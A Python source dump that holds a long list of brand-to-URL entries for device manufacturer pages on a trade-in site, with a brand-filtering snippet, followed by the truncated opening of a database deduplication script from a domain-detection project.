{'url': 'https://rq.rogerstrade.com/devices /manufacturer/263', 'brand': u'INQ'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/125', 'brand': u'Insignia'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/110', 'brand': u'iRex'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/109', 'brand': u'iRiver'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/148', 'brand': u'Irulu'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/338', 'brand': u'Itel'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/234', 'brand': u'iVIEW'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/212', 'brand': u'Iwireless'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/324', 'brand': u'Jiayu'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/321', 'brand': u'Karbonn'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/235', 'brand': u'Kaser'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/284', 'brand': u'Kobo'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/286', 'brand': u'Kurio'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/31?&p=1', 'brand': u'Kyocera'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/31?&p=2', 'brand': u'Kyocera'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/31?&p=3', 'brand': u'Kyocera'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/31?&p=4', 'brand': u'Kyocera'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/31?&p=5', 'brand': u'Kyocera'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/32', 'brand': u'LaCie'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/145', 'brand': u'Latte'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/329', 'brand': u'Lava'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/152', 'brand': u'LeapFrog'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/33?&p=1', 'brand': u'Lenovo'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/33?&p=2', 'brand': u'Lenovo'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/116', 'brand': u'Lenovo/IBM'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/236', 'brand': u'Le Pan'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/34?&p=1', 'brand': u'LG'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/34?&p=2', 'brand': u'LG'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/34?&p=3', 'brand': u'LG'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/34?&p=4', 'brand': u'LG'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/34?&p=5', 'brand': u'LG'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/34?&p=6', 'brand': u'LG'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/34?&p=7', 'brand': u'LG'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/34?&p=8', 'brand': u'LG'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/34?&p=9', 'brand': u'LG'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/34?&p=10', 'brand': u'LG'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/34?&p=11', 'brand': u'LG'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/34?&p=12', 'brand': u'LG'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/34?&p=13', 'brand': u'LG'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/34?&p=14', 'brand': u'LG'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/34?&p=15', 'brand': u'LG'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/34?&p=16', 'brand': u'LG'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/34?&p=17', 'brand': u'LG'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/34?&p=18', 'brand': u'LG'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/34?&p=19', 'brand': u'LG'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/34?&p=20', 'brand': u'LG'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/34?&p=21', 'brand': u'LG'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/34?&p=22', 'brand': u'LG'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/34?&p=23', 'brand': u'LG'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/34?&p=24', 'brand': u'LG'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/34?&p=25', 'brand': u'LG'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/34?&p=26', 'brand': u'LG'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/34?&p=27', 'brand': u'LG'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/219', 'brand': u'Logic'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/201', 'brand': u'Lynxx'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/237', 'brand': u'Mach Speed'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/238', 'brand': u'Matsunichi'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/375', 'brand': u'Max'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/264', 'brand': u'Maxwest'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/239', 'brand': u'Maylong'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/364', 'brand': u'MBD'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/327', 'brand': u'Meizu'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/221', 'brand': u'm-horse'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/274', 'brand': u'MI'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/214', 'brand': u'Micromax'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/240', 'brand': u'Microsel'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/37?&p=1', 'brand': u'Microsoft'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/37?&p=2', 'brand': u'Microsoft'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/123', 'brand': u'MID'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/370', 'brand': u'MIng'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/112', 'brand': u'MiTAC'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/39', 'brand': u'Mitsubishi'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/220', 'brand': u'Mobiper'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/241', 'brand': u'Monster'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/40?&p=1', 'brand': u'Motorola'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/40?&p=2', 'brand': u'Motorola'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/40?&p=3', 'brand': u'Motorola'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/40?&p=4', 'brand': u'Motorola'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/40?&p=5', 'brand': u'Motorola'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/40?&p=6', 'brand': u'Motorola'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/40?&p=7', 'brand': u'Motorola'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/40?&p=8', 'brand': u'Motorola'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/40?&p=9', 'brand': u'Motorola'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/40?&p=10', 'brand': u'Motorola'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/40?&p=11', 'brand': u'Motorola'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/40?&p=12', 'brand': u'Motorola'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/40?&p=13', 'brand': u'Motorola'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/40?&p=14', 'brand': u'Motorola'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/40?&p=15', 'brand': u'Motorola'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/40?&p=16', 'brand': u'Motorola'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/40?&p=17', 'brand': u'Motorola'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/40?&p=18', 'brand': u'Motorola'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/40?&p=19', 'brand': u'Motorola'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/40?&p=20', 'brand': u'Motorola'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/40?&p=21', 'brand': u'Motorola'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/40?&p=22', 'brand': u'Motorola'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/40?&p=23', 'brand': u'Motorola'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/282', 'brand': u'MTC'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/153', 'brand': u'Nabi'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/42', 'brand': u'NEC'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/341', 'brand': u'Nexbit'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/342', 'brand': u'Nextbit'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/242', 'brand': u'Nextbook'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/108', 'brand': u'Nextel'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/332', 'brand': u'Ninetology'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/344', 'brand': u'NIU'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/340', 'brand': u'No. 1'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/46?&p=1', 'brand': u'Nokia'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/46?&p=2', 'brand': u'Nokia'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/46?&p=3', 'brand': u'Nokia'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/46?&p=4', 'brand': u'Nokia'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/46?&p=5', 'brand': u'Nokia'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/46?&p=6', 'brand': u'Nokia'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/46?&p=7', 'brand': u'Nokia'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/46?&p=8', 'brand': u'Nokia'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/46?&p=9', 'brand': u'Nokia'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/46?&p=10', 'brand': u'Nokia'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/46?&p=11', 'brand': u'Nokia'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/46?&p=12', 'brand': u'Nokia'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/46?&p=13', 'brand': u'Nokia'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/46?&p=14', 'brand': u'Nokia'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/46?&p=15', 'brand': u'Nokia'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/46?&p=16', 'brand': u'Nokia'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/46?&p=17', 'brand': u'Nokia'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/46?&p=18', 'brand': u'Nokia'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/46?&p=19', 'brand': u'Nokia'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/46?&p=20', 'brand': u'Nokia'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/46?&p=21', 'brand': u'Nokia'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/46?&p=22', 'brand': u'Nokia'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/303', 'brand': u'NuVision'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/243', 'brand': u'NVIDIA'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/217', 'brand': u'OnePlus'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/322', 'brand': u'Oppo'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/49?&p=1', 'brand': u'Palm'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/49?&p=2', 'brand': u'Palm'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/50', 'brand': u'Panasonic'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/51', 'brand': u'Pandigital'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/52?&p=1', 'brand': u'Pantech'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/52?&p=2', 'brand': u'Pantech'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/52?&p=3', 'brand': u'Pantech'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/266', 'brand': u'Parla'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/154', 'brand': u'PCD'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/100', 'brand': u'Philips'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/319', 'brand': u'Pipo'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/134', 'brand': u'Plantronics'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/196', 'brand': u'Plum'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/346', 'brand': u'PNR'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/156', 'brand': u'Polaroid'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/193', 'brand': u'Posh'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/244', 'brand': u'Pyle'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/257', 'brand': u'Qtek'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/53?&p=1', 'brand': u'Qualcomm'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/53?&p=2', 'brand': u'Qualcomm'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/53?&p=3', 'brand': u'Qualcomm'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/355', 'brand': u'Quanta'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/205', 'brand': u'RCA'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/208', 'brand': u'Revel'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/213', 'brand': u'Riv'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/359', 'brand': u'Roam Mobility'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/113', 'brand': u'SAGEM'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/54?&p=1', 'brand': u'Samsung'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/54?&p=2', 'brand': u'Samsung'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/54?&p=3', 'brand': u'Samsung'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/54?&p=4', 'brand': u'Samsung'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/54?&p=5', 'brand': u'Samsung'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/54?&p=6', 'brand': u'Samsung'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/54?&p=7', 'brand': u'Samsung'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/54?&p=8', 'brand': u'Samsung'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/54?&p=9', 'brand': u'Samsung'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/54?&p=10', 'brand': u'Samsung'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/54?&p=11', 'brand': u'Samsung'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/54?&p=12', 'brand': u'Samsung'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/54?&p=13', 'brand': u'Samsung'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/54?&p=14', 'brand': u'Samsung'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/54?&p=15', 'brand': u'Samsung'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/54?&p=16', 'brand': u'Samsung'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/54?&p=17', 'brand': u'Samsung'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/54?&p=18', 'brand': u'Samsung'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/54?&p=19', 'brand': u'Samsung'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/54?&p=20', 'brand': u'Samsung'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/54?&p=21', 'brand': u'Samsung'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/54?&p=22', 'brand': u'Samsung'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/54?&p=23', 'brand': u'Samsung'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/54?&p=24', 'brand': u'Samsung'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/54?&p=25', 'brand': u'Samsung'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/54?&p=26', 'brand': u'Samsung'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/54?&p=27', 'brand': u'Samsung'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/54?&p=28', 'brand': u'Samsung'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/54?&p=29', 'brand': u'Samsung'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/54?&p=30', 'brand': u'Samsung'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/54?&p=31', 'brand': u'Samsung'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/54?&p=32', 'brand': u'Samsung'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/54?&p=33', 'brand': u'Samsung'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/54?&p=34', 'brand': u'Samsung'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/54?&p=35', 'brand': u'Samsung'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/54?&p=36', 'brand': u'Samsung'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/54?&p=37', 'brand': u'Samsung'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/54?&p=38', 'brand': u'Samsung'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/54?&p=39', 'brand': u'Samsung'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/54?&p=40', 'brand': u'Samsung'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/54?&p=41', 'brand': u'Samsung'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/54?&p=42', 'brand': u'Samsung'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/54?&p=43', 'brand': u'Samsung'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/54?&p=44', 'brand': u'Samsung'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/54?&p=45', 'brand': u'Samsung'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/54?&p=46', 'brand': u'Samsung'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/54?&p=47', 'brand': u'Samsung'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/54?&p=48', 'brand': u'Samsung'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/54?&p=49', 'brand': u'Samsung'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/54?&p=50', 'brand': u'Samsung'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/54?&p=51', 'brand': u'Samsung'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/56?&p=1', 'brand': u'Sanyo'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/56?&p=2', 'brand': u'Sanyo'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/56?&p=3', 'brand': u'Sanyo'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/351', 'brand': u'SFR'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/58?&p=1', 'brand': u'Sharp'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/58?&p=2', 'brand': u'Sharp'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/393', 'brand': u'Sho'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/59?&p=1', 'brand': u'Siemens'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/59?&p=2', 'brand': u'Siemens'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/59?&p=3', 'brand': u'Siemens'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/281', 'brand': u'SKK Mobile'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/336', 'brand': u'SKY'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/254', 'brand': u'skytex'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/270', 'brand': u'Smartab'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/304', 'brand': u'Social'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/117', 'brand': u'Sonim'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/63?&p=1', 'brand': u'Sony'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/63?&p=2', 'brand': u'Sony'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/63?&p=3', 'brand': u'Sony'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/63?&p=4', 'brand': u'Sony'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/63?&p=5', 'brand': u'Sony'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/63?&p=6', 'brand': u'Sony'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/64?&p=1', 'brand': u'Sony Ericsson'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/64?&p=2', 'brand': u'Sony Ericsson'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/64?&p=3', 'brand': u'Sony Ericsson'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/64?&p=4', 'brand': u'Sony Ericsson'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/64?&p=5', 'brand': u'Sony Ericsson'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/64?&p=6', 'brand': u'Sony Ericsson'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/64?&p=7', 'brand': u'Sony Ericsson'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/64?&p=8', 'brand': u'Sony Ericsson'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/64?&p=9', 'brand': u'Sony Ericsson'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/65', 'brand': u'Sprint'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/343', 'brand': u'Star'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/255', 'brand': u'sungale'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/245', 'brand': u'Supersonic'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/380', 'brand': u'SVP'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/204', 'brand': u'Sylvania'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/66', 'brand': u'Symbol'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/384', 'brand': u'TAG'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/267', 'brand': u'TCL Communication'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/328', 'brand': u'Tecno'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/356', 'brand': u'Telenor'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/290', 'brand': u'Tengda'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/334', 'brand': u'THL'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/246', 'brand': u'Tivax'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/68', 'brand': u'T-Mobile'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/69', 'brand': u'Toshiba'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/306', 'brand': u'TRUCONNECT'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/198', 'brand': u'UMX'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/150', 'brand': u'Uniden'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/367', 'brand': u'Uniscope'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/199', 'brand': u'Unnecto'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/365', 'brand': u'Uno'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/70?&p=1', 'brand': u'UTStarcom'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/70?&p=2', 'brand': u'UTStarcom'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/247', 'brand': u'Velocity Micro'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/71', 'brand': u'Verizon'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/216', 'brand': u'Verykool'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/339', 'brand': u'Videocon'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/248', 'brand': u'Viewsonic'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/249', 'brand': u'Visual Land'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/250', 'brand': u'Vivitar'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/335', 'brand': u'Vivo'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/160', 'brand': u'Vizio'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/114', 'brand': u'VK Mobile'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/330', 'brand': u'Vodafone'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/392', 'brand': u'Vogue'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/374', 'brand': u'Vortex'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/251', 'brand': u'Vulcan'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/325', 'brand': u'Wiko'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/252', 'brand': u'Wintec'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/323', 'brand': u'Worldphone'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/289', 'brand': u'Xiaocai'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/320', 'brand': u'Xiaomi'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/318', 'brand': u'Xolo'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/371', 'brand': u'XOM'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/381', 'brand': u'XOX'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/218', 'brand': u'Yezz'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/326', 'brand': u'YU'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/253', 'brand': u'Zeki'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/395', 'brand': u'Zhem'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/207', 'brand': u'Zipit'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/93?&p=1', 'brand': u'ZTE'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/93?&p=2', 'brand': u'ZTE'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/93?&p=3', 'brand': u'ZTE'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/93?&p=4', 'brand': u'ZTE'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/93?&p=5', 'brand': u'ZTE'},
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/93?&p=6', 'brand': u'ZTE'}]
nameUsed = [
"Apple",
"BlackBerry",
"Google",
"HTC",
"Huawei",
"LG",
"Motorola",
"Nokia",
"Samsung",
"Sony"
]
nameIn = list(set([one['brand'] for one in brandDict]))
for name in nameUsed:
if name in nameIn:
print '{} is in.'.format(name)
else:
print '{} is not in.'.format(name)
brandDictFiltered = filter(lambda x: x['brand'] in nameUsed, brandDict) | UTF-8 | Python | false | false | 38,761 | py | 70 | nameScript.py | 61 | 0.663605 | 0.628493 | 0 | 454 | 84.378855 | 111 |
xixi2/mal_domain_detection | 12,446,815,239,780 | 270a5fe0d3e0142f0be44e12dc77003024e137df | b5c3b8c1f8888d9acfe5a99ed4b6b786e45e468d | /active_node/remove_duplicate.py | bc251e519a814bb0e0a8b849a538c540005712a6 | []
| no_license | https://github.com/xixi2/mal_domain_detection | c6b1bb8a84ee7e8e54ea2e9f991e4e5a2ac54f33 | 84c2c853d1c5df183e6f8fdea464ebbed20cb41a | refs/heads/master | 2020-04-26T02:12:51.891086 | 2019-05-20T03:41:14 | 2019-05-20T03:41:14 | 173,228,166 | 2 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import time
from common.database_op import connect_db, query_db, delete_db
conn = connect_db()
def remove_double():
sql = "select DISTINCT(domain_name) from dns_answer"
res = query_db(conn, sql)
affected_ids = []
for item in res:
